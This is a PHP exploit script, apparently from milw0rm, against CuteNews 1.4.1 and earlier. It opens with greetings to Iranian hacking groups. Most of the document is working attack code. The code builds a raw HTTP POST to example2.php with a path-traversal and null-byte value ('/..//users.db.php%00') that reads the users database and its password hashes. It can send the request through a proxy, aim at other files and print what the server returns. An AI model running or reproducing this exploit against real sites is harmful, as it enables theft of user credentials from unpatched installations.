CuteNews 1.4.1 (and Below) user Hash password Finder

Security ? .

Bug Discovered and Exploited by Hamid Ebadi .: Hamid Network Security Team :.

Happy Norouz ( PERSIAN new year celebration ) Greetz to all Iranian Hackers spacially my friends in ihsteam.com c0d3r.org kapda.ir simorgh-ev.com hat-squad.com blacknews.ws ashiyane.com websecurity.ir crouz.com shabgard.org hackerz.ir and ...

read this paper about CuteNews 1.4.1 vulnerability

hostname (ex: www.sitename.com)

path (ex: /cutenews/example2.php )

specify a port other than 80 (default value)

send exploit through an HTTP proxy (ip:port)

specify a file other than /../users.db.php%00 to read

Spacial THX : rgod at http://rgod.altervista.org for his great codes (i just change few lines of RGOD old NETQUERY remote commands execution exploit)
'; function show($headeri) { $host=$_POST[host]; $path=$_POST[path]; $port=$_POST[port]; $proxy=$_POST[proxy]; $command=$_POST[command]; $ii=0; $ji=0; $ki=0; $ci=0; echo ''; while ($ii <= strlen($headeri)-1) { $datai=dechex(ord($headeri[$ii])); if ($ji==16) { $ji=0; $ci++; echo ""; for ($li=0; $li<=15; $li++) { echo ""; } $ki=$ki+16; echo ""; } if (strlen($datai)==1) {echo "";} else {echo " ";} $ii++; $ji++; } for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) { echo ""; } for ($li=$ci*16; $li<=strlen($headeri); $li++) { echo ""; } echo "
".$headeri[$li+$ki]."
0".$datai."".$datai." ".$headeri[$li]."
"; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; if ( ($host<>'')) { if ($port=='') {$port=80;} if ($path=='') {$path="example2.php";} if ($command=='') {$command="/..//users.db.php%00";} $data="archive=".$command; if ($proxy=='') {$packet="POST ".$path." HTTP/1.1\r\n";} else { $c = preg_match_all($proxy_regex,$proxy,$is_proxy); if ($c==0) { echo 'check the proxy...
'; die; } else {$packet="POST http://".$host.$path." HTTP/1.1\r\n";} } $packet.="Accept: */*\r\n"; $packet.="Referer: http://".$host.$path."\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Hamid/2006\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Keep-Alive\r\n"; $packet.="Cache-Control: no-cache\r\n\r\n"; $packet.=$data; echo '
Sending exploit to '.$host.'
'; if ($proxy=='') {$fp=fsockopen(gethostbyname($host),$port);} else {$parts=explode(':',$proxy); echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; $fp=fsockopen($parts[0],$parts[1]); if (!$fp) { echo 'No response from proxy...'; die; } } echo $packet ; show($packet); fputs($fp,$packet); if ($proxy=='') { $data=''; while (!feof($fp)) { $data.=fgets($fp); } } else { $data=''; while ((!feof($fp)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$data))) { $data.=fread($fp,1); } } fclose($fp); if (eregi('HTTP/1.1 200 OK',$data)) {echo 'Exploit sent...
If CuteNews 1.4.1 is unpatched and vulnerable
'; echo 'you will see '.htmlentities($command).' output inside HTML...

'; } else {echo 'Error, see output...';} //show($data); //debug: show output in a packet dump... //echo nl2br(htmlentities($data)); echo $data; } ?> # milw0rm.com [2006-03-26]